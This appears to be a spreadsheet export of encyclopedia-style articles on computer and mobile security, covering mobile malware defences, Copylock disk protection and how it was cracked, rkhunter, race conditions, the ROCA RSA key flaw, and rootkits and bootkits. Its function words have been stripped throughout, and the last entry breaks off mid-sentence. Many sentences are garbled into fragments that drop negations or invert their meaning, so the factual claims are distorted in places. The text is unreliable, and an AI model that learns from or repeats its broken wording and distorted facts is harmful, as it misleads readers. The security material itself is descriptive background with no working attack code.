malware. this partly variety operating systems smartphones. however attackers also choose make malware target multiple platforms, malware found attacks able spread different systems. begin with, malware runtime environments like java virtual machine .net framework. they also libraries present many operating systems. other malware carry several executable files order multiple environments utilize propagation process. practice, type malware requires connection operating systems attack vector. memory cards used purpose, synchronization software used propagate virus. countermeasures security mechanisms place counter threats described presented section. they divided different categories, level, range management security operating system behavioral education user. threats prevented various measures depending case. considering cases mentioned above, first case would protect system corruption application, second case installation suspicious software would prevented. security operating systems first layer security smartphone operating system (os). beyond needing handle usual roles operating system (e.g. resource management, scheduling processes) device, must also establish protocols introducing external applications data without introducing risk.a central paradigm mobile operating systems idea sandbox. since smartphones currently designed accommodate many applications, must mechanisms ensure applications safe phone itself, applications data system, user. malicious program reaches mobile device, vulnerable area presented system must small possible. sandboxing extends idea compartmentalize different processes, preventing interacting damaging other. based history operating systems, sandboxing different implementations. example, focus limiting access public applications store default, managed open allows restrict apps access types data. android bases sandboxing legacy linux trustedbsd. following points highlight mechanisms implemented operating systems, especially android. rootkit detectors intrusion rootkit system great danger computer. important prevent intrusions, able detect often possible. indeed, concern type malicious program, result could partial complete bypass device security, acquisition administrator rights attacker. happens, nothing prevents attacker studying disabling safety features circumvented, deploying applications want, disseminating method intrusion rootkit wider audience. cite, defense mechanism, chain trust ios. this mechanism relies signature different applications required start operating system, certificate signed apple. event signature checks inconclusive, device detects stops boot-up. operating system compromised jailbreaking, rootkit detection work disabled jailbreak method software loaded jailbreak disables rootkit detection.process isolation android uses mechanisms user process isolation inherited linux. each application user associated tuple (uid, gid). this approach serves sandbox: applications malicious, sandbox reserved identifiers, thus cannot interfere proper functioning system. example, since impossible process process another user, application thus stop execution another.file permissions from legacy linux, also filesystem permissions mechanisms. they help sandboxing: process edit files wants. therefore possible freely corrupt files necessary operation another application system. furthermore, android method locking memory permissions. possible change permissions files installed card phone, consequently impossible install applications.memory protection computer, memory protection prevents privilege escalation. indeed, process managed reach area allocated processes, could write memory process rights superior own, root worst case, perform actions beyond permissions system. would suffice insert function calls authorized privileges malicious application.development runtime environments software often developed high-level languages, control done running program. example, java virtual machines continuously monitor actions execution threads manage, monitor assign resources, prevent malicious actions. buffer overflows prevented controls. security software above operating system security, layer security software. this layer composed individual components strengthen various vulnerabilities: prevent malware, intrusions, identification user human, user authentication. contains software components learned experience computer security; however, smartphones, software must deal greater constraints (see limitations). antivirus firewall antivirus software deployed device verify infected known threat, usually signature detection software detects malicious executable files. firewall, meanwhile, watch existing traffic network ensure malicious application seek communicate equally verify installed application seek establish suspicious communication, prevent intrusion attempt.a mobile antivirus product would scan files compare database known mobile malware code signatures. visual notifications order make user aware abnormal actions, call initiate, link functions visual notification impossible circumvent. example, call triggered, called number always displayed. thus, call triggered malicious application, user see, take appropriate action.turing test vein above, important confirm certain actions user decision. turing test used distinguish human virtual user, often comes captcha.biometric identification another method biometrics. biometrics technique identifying person means morphology(by recognition face eye, example) behavior (their signature writing example). advantage using biometric security users avoid remember password secret combination authenticate prevent malicious users accessing devices. system strong biometric security, primary user access smartphone. resource monitoring smartphone when application passes various security barriers, take actions designed. when actions triggered, activity malicious application sometimes detected monitors various resources used phone. depending goals malware, consequences infection always same; malicious applications intended harm devices deployed. following sections describe different ways detect suspicious activity. battery some malware aimed exhausting energy resources phone. monitoring energy consumption phone detect certain malware applications.memory usage memory usage inherent application. however, finds substantial proportion memory used application, flagged suspicious.network traffic smartphone, many applications bound connect network, part normal operation. however, application using bandwidth strongly suspected attempting communicate information, disseminate data many devices. this observation allows suspicion, legitimate applications resource-intensive terms network communications, best example streaming video.services monitor activity various services smartphone. during certain moments, services active, detected, application suspected. example, sending user filming video: communication make sense suspicious; malware attempt send activity masked.the various points mentioned indications provide certainty legitimacy activity application. however, criteria help target suspicious applications, especially several crit</t>
  </si>
  <si>
    <t>Rob Northen copylock</t>
  </si>
  <si>
    <t>northen copylock (also known simply copylock) copy-protection system designed prevent disk duplication standard floppy disk drives amiga, atari ms-dos platforms. created british programmer northen founding company copylock software. used mainly prevent games copied regular users. history 1984, northen hired acornsoft write copy protection routines published software, original elite micro. northen left company months later started company copylock software, still working part-time acornsoft write copy protection routines, file systems disk utilities. northen's first copy-protected software copylock name came 1987 atari first version copylock software used protect early commodore amiga atari games multi-load, hence reside single floppy disk. initially, publishers would send unprotected master disk northen, would replace loader program encrypted loader ship protected master disk duplication. following requests game developers, bitmap brothers, keen implement complex protection checks, northen wrote subroutines developers could implement liking. 1990, purchased disk duplicator used create floppies copylock serial numbers embedded them, would send developers lieu protected master disks, along copylock routines include games. this copylock series could accommodate recent games multi-load spanning across multiple floppies. also allowed protection checks included arbitrary points game code: example hook computer game ocean software, included in-game protection check failed would cause item, namely mug, disappear game.in 1990, copylock also ported ms-dos-based systems. 1996, around commercial amiga games reportedly protected copylock. technical details copylock-protected floppy disk contains long track, known copylock serial track, read standard floppy drive impossible write without sophisticated disk duplication machine. disk contains special loader heavily encrypted read decode copylock serial track. encrypted code verifies disk correct copylock serial key, uniquely generated game. machine language level, copylock works using motorola 68000 trace mode, causes processor execute specific trace vector instruction main program. trace vector decodes machine language code just-in-time executed re-encrypts execution, instructions stored unencrypted physical memory given time. this called trace vector decoder originally implemented atari platform afterwards copied early amiga models, based 68000 architecture. first series there types copylock routine earlier series. internal type, copylock serial particular software passed hardware register stored memory address $24. inventive programmers could serial specific purposes force would-be cracker remove additional checks game. however, many early titles, programmers typically performed check serial key, easy find program therefore disable. wrapper type, code start game, boot routine, encrypted included copylock code. disk validity checking performed copylock code: successful, trace vector decoding extends encrypted boot routine file; data moved location expected game code routine executed. this type series copylock often used games loaded need access disk drive again. however, meant copy protection rendered useless game decrypted, game could 'single-filed', i.e. dumped entirely memory, saved disk made work independently copylock routines. second series series evolution internal series routines, made early versions easy circumvent, since many programmers implemented simple protection check read serial copylock serial track checked correct. crackers often even need inspect encoded copylock routines, check disk authenticity implemented could clearly serial code checked therefore, whilst many people understood copylock worked, taken time work actually decode one. now, however, copylock evolved allow parameters passed execution, meant copylock could write serial key, also specific game-related values contents registers passed copylock, simply write values list predefined addresses, would make game operate correctly. typical, generally incorrect cracking copylocked game serial key, modify header copylock correct serial register bypass reading decoding process. this would mean "special case" code copylock would never executed, would mean game would work using serial alone. version possible port copylock microprocessor supports trace vector 68000 processor does, single-step interrupt manifested slightly different game's executable code encrypted "wrapped" copylock loader. runtime loader would read sectors floppy, generate checksums them. these turn would used keys decrypt game code. once decryption done, loader transferred control game program. version easy circumvent, original game executable code stored inside loader. once past disk checks, encryption code, dumping unencrypted executable matter performing disk writes. first would dump unmodified "mz" header, write would finish saving actual game code. fabulous furlough humble guys wrote tool that, could "crack" game less minute. references external links interview northen copy-protection systems northen mobygames example series copylock 'wrapper' type: barbarian atari (also available read-only mirror) example series copylock 'internal' type: xenon atari (also available read-only mirror) source program analyzes removes northen copylock protections atari</t>
  </si>
  <si>
    <t>Mobile simulator</t>
  </si>
  <si>
    <t>mobile simulator software application personal computer creates virtual machine version mobile device, mobile phone, iphone, smartphone, calculator, computer. this sometimes also termed emulator. mobile simulator allows user features applications virtual mobile computer though actual mobile device.a mobile simulator lets test website determine well performs various types mobile devices. good simulator tests mobile content quickly multiple browsers emulates several device profiles simultaneously. this allows analysis mobile content real-time, locate errors code, view rendering environment simulates mobile browser, optimize site performance.mobile simulators developed using programming languages java, .net javascript. also mobile application development simulation general information simulation web-based emulation motion simulator mobile simulator entertainment world references external links nokia mobile browser simulator emulator</t>
  </si>
  <si>
    <t>Mobile virtualization</t>
  </si>
  <si>
    <t>mobile virtualization hardware virtualization mobile phone connected wireless device. enables multiple operating systems virtual machines simultaneously mobile phone connected wireless device. uses hypervisor create secure separation underlying hardware software runs considered form embedded hypervisor, close analogue. virtualization technology used widely many years fields data servers (storage virtualization) personal computers (desktop virtualization). applications cost platform 2008, mobile industry became interested using benefits virtualization technology cell phones devices like tablets, netbooks machine-to-machine (m2m) modules. with mobile virtualization, mobile devices manufactured cheaply re-use software hardware, shortens development time. example using mobile virtualization create low-cost android smartphones without separate baseband processor running applications baseband processor code separate virtual machines single processor. semiconductor vendors st-ericsson adopted mobile virtualization part low-cost android platform strategy. enterprise another case mobile virtualization enterprise market. today, many consumers carry mobile phones: business another personal use. with mobile virtualization, mobile phones support multiple domains/operating systems hardware, enterprise department securely manage domain virtual machine), mobile operator separately manage domain virtual machine).in september 2010, announced would support virtualization extension cortex-a15 processor. platforms every mobile platform virtualization differently. android android many ways virtualization, however limitations operating system security restrictions types virtualization software able tasks types applications. also embedded hypervisor references</t>
  </si>
  <si>
    <t>Rkhunter</t>
  </si>
  <si>
    <t>rkhunter (rootkit hunter) unix-based tool scans rootkits, backdoors possible local exploits. comparing sha-1 hashes important files known good ones online databases, searching default directories rootkits), wrong permissions, hidden files, suspicious strings kernel modules, special tests linux freebsd. rkhunter notable inclusion popular operating systems (fedora, debian, etc.) tool written bourne shell, allow portability. almost unix-derived systems. development 2003, developer michael boelen released version rootkit hunter. after several years development, early 2006, agreed hand development development team. since time eight people working project properly work towards much-needed maintenance release. project since moved sourceforge. also chkrootkit lynis ossec samhain (software) host-based intrusion detection system comparison hardening (computing) linux malware malwaremustdie rootkit references external links official website rkhunter page</t>
  </si>
  <si>
    <t>Race condition</t>
  </si>
  <si>
    <t>race condition race hazard condition electronics, software, system system's substantive behavior dependent sequence timing uncontrollable events. becomes possible behaviors undesirable. term race condition already 1954, example david huffman's doctoral thesis "the synthesis sequential switching circuits".race conditions occur especially logic circuits, multithreaded, distributed software programs. electronics typical example race condition occur logic gate combines signals traveled along different paths source. inputs gate change slightly different times response change source signal. output may, brief period, change unwanted state settling back designed state. certain systems tolerate glitches output functions clock signal systems contain memory, example, system rapidly depart designed behaviour effect, temporary glitch becomes permanent glitch). consider, example, two-input gate following logic: logic signal {\displaystyle input negation, {\displaystyle \neg (the boolean negation), another input theory never output true value: {\displaystyle a\wedge {\overline {a}}\neq however, changes value {\displaystyle take longer propagate second input first {\displaystyle changes false true brief period ensue inputs true, gate's output also true. critical non-critical forms critical race condition occurs order internal variables changed determines eventual state state machine non-critical race condition occurs order internal variables changed determine eventual state state machine static, dynamic, essential forms static race condition occurs signal complement combined. dynamic race condition occurs results multiple transitions intended. they interaction gates. eliminated using levels gating. essential race condition occurs input transitions less total feedback propagation time. sometimes cured using inductive delay line elements effectively increase time duration input signal. workarounds design techniques karnaugh maps encourage designers recognize eliminate race conditions cause problems. often logic redundancy added eliminate kinds races. well problems, logic elements enter metastable states, create problems circuit designers. software race condition arises software computer program multiple code paths executing time. multiple code paths take different amount time expected, finish different order expected, cause software bugs unanticipated behavior. critical race conditions cause invalid execution software bugs. critical race conditions often happen processes threads depend shared state. operations upon shared states done critical sections must mutually exclusive. failure obey rule corrupt shared state. data race type race condition. data races important parts various formal memory models. memory model defined c++11 standards specify program containing data race undefined behavior.a race condition difficult reproduce debug result nondeterministic depends relative timing interfering threads. problems nature therefore disappear running debug mode, adding extra logging, attaching debugger. disappears like debugging attempts often referred "heisenbug". therefore better avoid race conditions careful software design. example assume threads increment value global integer variable ideally, following sequence operations would take place: case shown above, final value expected. however, threads simultaneously without locking synchronization, outcome operation could wrong. alternative sequence operations demonstrates scenario: case, final value instead expected result this occurs increment operations mutually exclusive. mutually exclusive operations cannot interrupted accessing resource memory location. data race regard data races subset race conditions. precise definition data race specific formal concurrency model used, typically refers situation memory operation thread could potentially attempt access memory location time memory operation another thread writing memory location, context dangerous. this implies data race different race condition possible nondeterminism timing even program without data races, example, program memory accesses atomic operations. this dangerous many platforms, threads write memory location time, possible memory location holding value arbitrary meaningless combination bits representing values thread attempting write; could result memory corruption resulting value neither thread attempted write (sometimes called 'torn write'). similarly, thread reads location another thread writing possible read return value arbitrary meaningless combination bits representing value memory location held write, bits representing value written. many platforms, special memory operations provided simultaneous access; cases, typically simultaneous access using special operations safe, simultaneous access using memory operations dangerous. sometimes special operations (which safe simultaneous access) called atomic synchronization operations, whereas ordinary operations (which unsafe simultaneous access) called data operations. this probably term data race; many platforms, race condition involving synchronization operations, race nondeterministic otherwise safe; data race could lead memory corruption undefined behavior. example definitions data races particular concurrency models precise definition data race differs across formal concurrency models. this matters concurrent behavior often non-intuitive formal reasoning sometimes applied. standard, draft n4296 (2014-11-19), defines data race follows section 1.10.23 (page actions potentially concurrent performed different threads, unsequenced, least performed signal handler.the execution program contains data race contains potentially concurrent conflicting actions, least atomic, neither happens other, except special case signal handlers described [omitted]. data race results undefined behavior. parts definition relating signal handlers idiosyncratic typical definitions data race. paper detecting data races weak memory systems provides different definition: "two memory operations conflict access location least write operation... "two memory operations, sequentially consistent execution form race 〈x,y〉, conflict, ordered relation execution. race 〈x,y〉, data race least data operation. here memory operations accessing location, write. relation defined elsewhere paper, example typical "happens-before" relation; intuitively, prove situation memory operation guaranteed executed completion another memory operation begins, happens-before neither happens-before happens-before "not ordered relation". clause "...and ordered relation execution" intuitively translated "...and potentially concurrent". paper considers dangerous situations least memory operations "data operation"; parts paper, paper also defines class "synchronization operations" safe potentially simultaneous use, contrast "data operations". java language specification provides different definition: accesses (reads writes variable said conflicting least accesses write...when program contains conflicting accesses (§17.4.1) ordered happens-before relationship, said contain data race...a data race cannot cause incorrect behavior returning wrong length array. critical difference approach java approach c++, data race undefined behavior, whereas java, data race merely affects "inter-thread actions". this means c++, attempt execute program containing data race could (while still adhering spec) crash could exhibit insecure bizarre behavior, whereas java, attempt execute program containing data race produce undesired concurrency behavior otherwise (assuming implementation adheres spec) safe. important facet data races contexts, program free data races guaranteed execute sequentially consistent manner, greatly easing reasoning concurrent behavior program. formal memory models provide guarantee said exhibit drf" (sequential consistency data race freedom) property. this approach said achieved recent consensus (presumably compared approaches guarantee sequential consistency cases, approaches guarantee all).for example, java, guarantee directly specified: program correctly synchronized sequentially consistent executions free data races. program correctly synchronized, executions program appear sequentially consistent (§17.4.3). this extremely strong guarantee programmers. programmers need reason reorderings determine code contains data races. therefore need reason reorderings determining whether code correctly synchronized. once determination code correctly synchronized made, programmer need worry reorderings affect code. program must correctly synchronized avoid kinds counterintuitive behaviors observed code reordered. correct synchronization ensure overall behavior program correct. however, allow programmer reason possible behaviors program simple way; behavior correctly synchronized program much less dependent possible reorderings. without correct synchronization, strange, confusing counterintuitive behaviors possible. contrast, draft specification directly require property, merely observes exists theorem providing [note:it shown programs correctly mutexes memory_order_seq_cst operations prevent data races synchronization operations behave operations executed constituent threads simply interleaved, value computation object taken last side effect object interleaving. this normally referred “sequential consistency”. however, applies data-race-free programs, data-race-free programs cannot observe program transformations change single-threaded program semantics. fact, single-threaded program transformations continue allowed, since program behaves differently result must perform undefined operation.— note note draft specification admits possibility programs valid synchronization operations memory_order memory_order_seq_cst, case result program correct guarantee sequentially consistency provided. words, c++, correct programs sequentially consistent. this approach thought give programmers freedom choose faster program execution cost giving ease reasoning program.there various theorems, often provided form memory models, provide guarantees given various contexts. premises theorems typically place constraints upon memory model (and therefore upon implementation), also upon programmer; say, typically case programs meet premises theorem could guaranteed execute sequentially consistent manner. drf1 memory model provides allows optimizations (weak ordering), rcsc (release consistency sequentially consistent special operations), memory model, data-race-free-0 memory models. plpc memory model provides allows optimizations (total store order), pso, (processor consistency), rcpc (release consistency processor consistency special operations) models. drfrlx provides sketch theorem presence relaxed atomics. computer security many software race conditions associated computer security implications. race condition allows attacker access shared resource cause actors utilize resource malfunction, resulting effects including denial service privilege escalation.a specific kind race condition involves checking predicate (e.g. authentication), acting predicate, state change time check time use. when kind exists security-sensitive code, security vulnerability called time-of-check-to-time-of-use (tocttou) created. race conditions also intentionally used create hardware random number generators physically unclonable functions. pufs created designing circuit topologies identical paths node relying manufacturing variations randomly determine paths complete first. measuring manufactured circuit's specific race condition outcomes, profile collected circuit kept secret order later verify circuit's identity. file systems programs collide attempts modify access file system, result data corruption privilege escalation. file locking provides commonly used solution. cumbersome remedy involves organizing system unique process (running daemon like) exclusive access file, processes need access data file interprocess communication process. this requires synchronization process level. different form race condition exists file systems unrelated programs affect suddenly using available resources disk space, memory space, processor cycles. software carefully designed anticipate handle race situation become unpredictable. such risk overlooked long time system seems reliable. eventually enough data accumulate enough software added critically destabilize many parts system. example occurred near loss mars rover "spirit" long landing. solution software request reserve resources need beginning task; request fails task postponed, avoiding many points failure could occurred. alternatively, points equipped error handling, success entire task verified afterwards, continuing. common approach simply verify enough system resources available starting task; however, adequate complex systems actions running programs unpredictable. networking networking, consider distributed chat network like irc, user starts channel automatically acquires channel-operator privileges. users different servers, different ends network, start same-named channel time, user's respective server grant channel-operator privileges user, since neither server received server's signal allocated channel. (this problem largely solved various server implementations.) case race condition, concept "shared resource" covers state network (what channels exist, well users started therefore privileges), server freely change long signals servers network changes update conception state network. however, latency across network makes possible kind race condition described. case, heading race conditions imposing form control access shared resource—say, appointing server control holds privileges—would mean turning distributed network centralized least part network operation). race conditions also exist computer program written non-blocking sockets, case performance program dependent speed network link. life-critical systems software flaws life-critical systems disastrous. race conditions among flaws therac-25 radiation therapy machine, death least three patients injuries several more.another example energy management system provided energy used ohio-based firstenergy corp (among power facilities). race condition existed alarm subsystem; three sagging power lines tripped simultaneously, condition prevented alerts raised monitoring technicians, delaying awareness problem. this software flaw eventually north american blackout 2003. energy later developed software patch correct previously undiscovered error. tools many software tools exist help detect race conditions software. they largely categorized groups: static analysis tools dynamic analysis tools. thread safety analysis static analysis tool annotation-based intra-procedural static analysis, originally implemented branch gcc, reimplemented clang, supporting pthreads.dynamic analysis tools include: intel inspector, memory thread checking debugging tool increase reliability, security, accuracy c/c++ fortran applications; intel advisor, sampling based, simd vectorization optimization shared memory threading assistance tool c++, fortran software developers architects; threadsanitizer, uses binary (valgrind-based) source, llvm-based instrumentation, supports pthreads); helgrind, valgrind tool detecting synchronisation errors fortran programs posix pthreads threading primitives. data race detector designed find data races programming language.there several benchmarks designed evaluate effectiveness data race detection tools dataracebench benchmark suite designed systematically quantitatively evaluate data race detection tools analyze multi-threaded applications written openmp. areas neuroscience demonstrating race conditions occur mammal brains well.in railway signalling, race condition would arise carrying rule according rule, train stopped running line signal, locomotive fireman would walk signal order remind signalman train present. least case, winwick 1934, accident occurred signalman accepted another train fireman arrived. modern signalling practice removes race condition making possible driver instantaneously contact signal radio. also call collision concurrency control deadlock hazard (logic) linearizability racetrack problem symlink race synchronization (computer science) time check time test-and-set references external links karam, g.m.; buhr, r.j.a. (august 1990). "starvation critical race analyzers ada". ieee transactions software engineering. (8): 829–843. doi:10.1109/32.57622. fuhrer, r.m.; lin, nowick, s.m. (march 1995). "algorithms optimal state assignment asynchronous state machines". advanced research vlsi, 1995. proceedings., 16th conference 59–75. doi:10.1109/arvlsi.1995.515611. isbn 978-0-8186-7047-3. s2cid 4435912. archived 2021-06-10 wayback machine paper novel framework solving state assignment problem event-based specifications" luciano lavagno, moon, robert brayton, alberto sangiovanni-vincentelli wheeler, david october 2004). "secure programmer: prevent race conditions—resource contention used you". developerworks. archived original (pdf) february 2009. chapter "avoid race conditions archived 2014-03-09 wayback machine" (secure programming linux unix howto) race conditions, security, immutability java, sample source code comparison code, chiral software karpov, andrey april 2009). "interview dmitriy vyukov author relacy race detector (rrd)". intel software library articles. microsoft support description race condition data race</t>
  </si>
  <si>
    <t>NIST SP 800-90B</t>
  </si>
  <si>
    <t>nist 800-90b ("sp" stands "special publication") publication national institute standards technology title recommendation entropy sources used random generation. publication specifies design principles requirements entropy sources used random-bit generators, tests validation entropy sources. these entropy sources intended combined deterministic random-bit generator mechanisms specified nist 800-90a construct random-bit generators, specified nist 800-90c.as work federal government, nist 800-90b public domain freely available. nist 800-90b version history references</t>
  </si>
  <si>
    <t>RRoD</t>
  </si>
  <si>
    <t>ROCA vulnerability</t>
  </si>
  <si>
    <t>roca vulnerability cryptographic weakness allows private pair recovered public keys generated devices vulnerability. "roca" acronym "return coppersmith's attack". vulnerability given identifier cve-2017-15361. vulnerability arises problem approach generation used software library, rsalib, provided infineon technologies, incorporated many smart cards, trusted platform module (tpm), hardware security modules (hsm) implementations, including yubikey tokens, often used generate keys. keys lengths 512, 1024, 2048 bits generated using infineon library vulnerable practical roca attack. research team discovered attack (all masaryk university matúš nemec marek sýs) estimate affected around one-quarter current devices globally. millions smart cards believed affected.the team informed infineon rsalib problem february 2017, withheld public notice mid-october, citing responsible disclosure. time announced attack provided tool test public keys vulnerability. they published details attack november. technical details generating involves selecting large randomly-generated prime numbers, process time-consuming, particularly small devices, smart cards. addition primes, numbers certain properties best security. vulnerable rsalib selection process quickly creates primes desired type testing primality numbers form: 65537 {\displaystyle k*m+(65537^{a}\mod {m})} {\displaystyle product first successive primes 13,...), constant depends desired size. security based secret constants {\displaystyle {\displaystyle roca attack exploits particular format primes using variation coppersmith method. addition, public keys generated distinctive fingerprint quickly recognized attempting compute discrete logarithm public {\displaystyle base 65537. computing discrete logarithms large group usually extremely difficult, case done efficiently using pohlig–hellman algorithm {\displaystyle smooth number. test site available internet. short, keys format significantly entropy attacked relatively efficiently (weeks months), format confirmed ("fingerprinted") attacker quickly (microseconds). multiple implementations attack publicly available. mitigation roca authors consider public keys length 512, 1024 2048-bits generated rsalib vulnerable. because details generation differ different lengths, shorter keys necessarily vulnerable longer keys. example, 1952-bit rsalib stronger 2048-bit 4096-bit weaker 3072-bit key. best mitigation, according authors, generate keys using stronger method, openssl. possible, roca authors suggest using lengths less susceptible roca 3936-bit, 3072-bit 2048-bit size maximum, 1952-bits.: infineon released firmware updates trusted platform modules manufacturers used tpms. implications vulnerability highlighted several shortcomings common criteria certification scheme vulnerability present list common criteria certified smart card products. namely, approval homegrown cryptographic algorithms; lack transparency certification reports, inability revoke common criteria certificates known vulnerable products distribute information users certified products.: 6.7.5 estonia, discovery vulnerability resulted state-level cyber crisis vulnerable smart card chip deployed 750,000 estonian identity cards used daily estonian residents e-residents securely authenticate online create digital signatures.: also bitlocker security concerns infineon technologies security flaw trusted platform module references external links roca detection tool (detection source code) roca vulnerability test suite (online tool testing keys, files, github accounts, gnupg keys, includes s/mime email responder) trustmonitor roca vulnerability test (online tool testing multiple certificates) detect trusted platform modules vulnerable cve-2017-15361 (scripts)</t>
  </si>
  <si>
    <t>RootkitRevealer</t>
  </si>
  <si>
    <t>rootkitrevealer proprietary freeware tool rootkit detection microsoft windows bryce cogswell mark russinovich. runs windows windows server 2003 (32-bit-versions only). output lists windows registry file system discrepancies indicate presence rootkit. tool triggered sony copy protection rootkit scandal.rootkitrevealer longer developed.: 08:16 also sysinternals process explorer process monitor procdump references</t>
  </si>
  <si>
    <t>Rootkit</t>
  </si>
  <si>
    <t>rootkit collection computer software, typically malicious, designed enable access computer area software otherwise allowed (for example, unauthorized user) often masks existence existence software. term rootkit compound "root" (the traditional name privileged account unix-like operating systems) word "kit" (which refers software components implement tool). term "rootkit" negative connotations association malware.rootkit installation automated, attacker install obtained root administrator access. obtaining access result direct attack system, i.e. exploiting known vulnerability (such privilege escalation) password (obtained cracking social engineering tactics like "phishing"). once installed, becomes possible hide intrusion well maintain privileged access. full control system means existing software modified, including software might otherwise used detect circumvent rootkit detection difficult rootkit able subvert software intended find detection methods include using alternative trusted operating system, behavioral-based methods, signature scanning, difference scanning, memory dump analysis. removal complicated practically impossible, especially cases rootkit resides kernel; reinstallation operating system available solution problem. when dealing firmware rootkits, removal require hardware replacement, specialized equipment. history term rootkit root originally referred maliciously modified administrative tools unix-like operating system granted "root" access. intruder could replace standard administrative tools system rootkit, intruder could obtain root access system whilst simultaneously concealing activities legitimate system administrator. these first-generation rootkits trivial detect using tools tripwire compromised access information. lane davis steven dake wrote earliest known rootkit 1990 microsystems' sunos unix operating system. lecture gave upon receiving turing award 1983, thompson bell labs, creators unix, theorized subverting compiler unix distribution discussed exploit. modified compiler would detect attempts compile unix login command generate altered code would accept user's correct password, additional "backdoor" password known attacker. additionally, compiler would detect attempts compile version compiler, would insert exploits compiler. review source code login command updated compiler would reveal malicious code. this exploit equivalent rootkit. first documented computer virus target personal computer, discovered 1986, used cloaking techniques hide itself: brain virus intercepted attempts read boot sector, redirected elsewhere disk, copy original boot sector kept. over time, dos-virus cloaking methods became sophisticated. advanced techniques included hooking low-level disk bios interrupt calls hide unauthorized modifications files.the first malicious rootkit windows operating system appeared 1999: trojan called ntrootkit created greg hoglund. followed hackerdefender 2003. first rootkit targeting appeared 2009, stuxnet worm first target programmable logic controllers (plc). sony copy protection rootkit scandal 2005, sony published copy protection digital rights management software called extended copy protection, created software company first internet. software included music player silently installed rootkit limited user's ability access software engineer mark russinovich, created rootkit detection tool rootkitrevealer, discovered rootkit computers. ensuing scandal raised public's awareness rootkits. cloak itself, rootkit user file starting "$sys$". soon russinovich's report, malware appeared took advantage vulnerability affected systems. analyst called "public relations nightmare." sony released patches uninstall rootkit, exposed users even serious vulnerability. company eventually recalled cds. united states, class-action lawsuit brought sony bmg. greek wiretapping case 2004–05 greek wiretapping case 2004–05, also referred greek watergate, involved illegal telephone tapping mobile phones vodafone greece network belonging mostly members greek government top-ranking civil servants. taps began sometime near beginning august 2004 removed march 2005 without discovering identity perpetrators. intruders installed rootkit targeting ericsson's telephone exchange. according ieee spectrum, "the first time rootkit observed special-purpose system, case ericsson telephone switch." rootkit designed patch memory exchange running, enable wiretapping disabling audit logs, patch commands list active processes active data blocks, modify data block checksum verification command. "backdoor" allowed operator sysadmin status deactivate exchange's transaction log, alarms access commands related surveillance capability. rootkit discovered intruders installed faulty update, caused texts undelivered, leading automated failure report generated. ericsson engineers called investigate fault discovered hidden data blocks containing list phone numbers monitored, along rootkit illicit monitoring software. uses modern rootkits elevate access, rather used make another software payload undetectable adding stealth capabilities. most rootkits classified malware, payloads bundled malicious. example, payload might covertly steal user passwords, credit card information, computing resources, conduct unauthorized activities. small number rootkits considered utility applications users: example, rootkit might cloak cd-rom-emulation driver, allowing video game users defeat anti-piracy measures require insertion original installation media physical optical drive verify software legitimately purchased. rootkits payloads many uses: provide attacker full access backdoor, permitting unauthorized access example, steal falsify documents. ways carry subvert login mechanism, /bin/login program unix-like systems gina windows. replacement appears function normally, also accepts secret login combination allows attacker direct access system administrative privileges, bypassing standard authentication authorization mechanisms. conceal malware, notably password-stealing loggers computer viruses. appropriate compromised machine zombie computer attacks computers. (the attack originates compromised system network, instead attacker's system.) "zombie" computers typically members large botnets can–amongst things–launch denial-of-service attacks, distribute e-mail spam, conduct click fraud.in instances, rootkits provide desired functionality, installed intentionally behalf computer user: detect attacks, example, honeypot. enhance emulation software security software. alcohol 120% daemon tools commercial examples non-hostile rootkits used defeat copy-protection mechanisms safedisc securom. kaspersky antivirus software also uses techniques resembling rootkits protect malicious actions. loads drivers intercept system activity, prevents processes harm itself. processes hidden, cannot terminated standard methods. anti-theft protection: laptops bios-based rootkit software periodically report central authority, allowing laptop monitored, disabled wiped information event stolen. bypassing microsoft product activation types there least five types rootkit, ranging lowest level firmware (with highest privileges), least privileged user-based variants operate ring hybrid combinations occur spanning, example, user mode kernel mode. user mode user-mode rootkits ring along applications user, rather low-level system processes. they number possible installation vectors intercept modify standard behavior application programming interfaces (apis). some inject dynamically linked library (such .dll file windows, .dylib file processes, thereby able execute inside target process spoof others sufficient privileges simply overwrite memory target application. injection mechanisms include: vendor-supplied application extensions. example, windows explorer public interfaces allow third parties extend functionality. interception messages. debuggers. exploitation security vulnerabilities. function hooking patching commonly used apis, example, hide running process file resides filesystem....since user mode applications memory space, rootkit needs perform patching memory space every running application. addition, rootkit needs monitor system applications execute patch programs' memory space fully execute. kernel mode kernel-mode rootkits highest operating system privileges (ring adding code replacing portions core operating system, including kernel associated device drivers. most operating systems support kernel-mode device drivers, execute privileges operating system itself. such, many kernel-mode rootkits developed device drivers loadable modules, loadable kernel modules linux device drivers microsoft windows. this class rootkit unrestricted security access, difficult write. complexity makes bugs common, bugs code operating kernel level seriously impact system stability, leading discovery rootkit. first widely known kernel rootkits developed windows released phrack magazine 1999 greg hoglund. kernel rootkits especially difficult detect remove operate security level operating system itself, thus able intercept subvert trusted operating system operations. software, antivirus software, running compromised system equally vulnerable. situation, part system trusted. rootkit modify data structures windows kernel using method known direct kernel object manipulation (dkom). this method used hide processes. kernel mode rootkit also hook system service descriptor table (ssdt), modify gates user mode kernel mode, order cloak itself. similarly linux operating system, rootkit modify system call table subvert kernel functionality. common rootkit creates hidden, encrypted filesystem hide malware original copies files infected. operating systems evolving counter threat kernel-mode rootkits. example, 64-bit editions microsoft windows implement mandatory signing kernel-level drivers order make difficult untrusted code execute highest privileges system. bootkits kernel-mode rootkit variant called bootkit infect startup code like master boot record (mbr), volume boot record (vbr), boot sector, used attack full disk encryption systems. example attack disk encryption "evil maid attack", attacker installs bootkit unattended computer. envisioned scenario maid sneaking hotel room victims left hardware. bootkit replaces legitimate boot loader control. typically malware loader persists transition protected mode kernel loaded, thus able subvert kernel. example, "stoned bootkit" subverts system using compromised boot loader intercept encryption keys passwords. 2010, alureon rootkit successfully subverted requirement 64-bit kernel-mode driver signing windows modifying master boot record. although malware sense something user want, certain "vista loader" "windows loader" software work similar injecting acpi slic (system licensed internal code) table ram-cached version bios boot, order defeat windows vista windows activation process. this vector attack rendered useless (non-server) versions windows unique, machine-specific system, used machine. many antivirus companies provide free utilities programs remove bootkits. hypervisor level rootkits created type hypervisors academia proofs concept. exploiting hardware virtualization features intel amd-v, type rootkit runs ring hosts target operating system virtual machine, thereby enabling rootkit intercept hardware calls made original operating system. unlike normal hypervisors, load operating system, load operating system promoting virtual machine. hypervisor rootkit make modifications kernel target subvert however, mean cannot detected guest operating system. example, timing differences detectable instructions. "subvirt" laboratory rootkit, developed jointly microsoft university michigan researchers, academic example virtual-machine–based rootkit (vmbr), blue pill software another. 2009, researchers microsoft north carolina state university demonstrated hypervisor-layer anti-rootkit called hooksafe, provides generic protection kernel-mode rootkits. windows 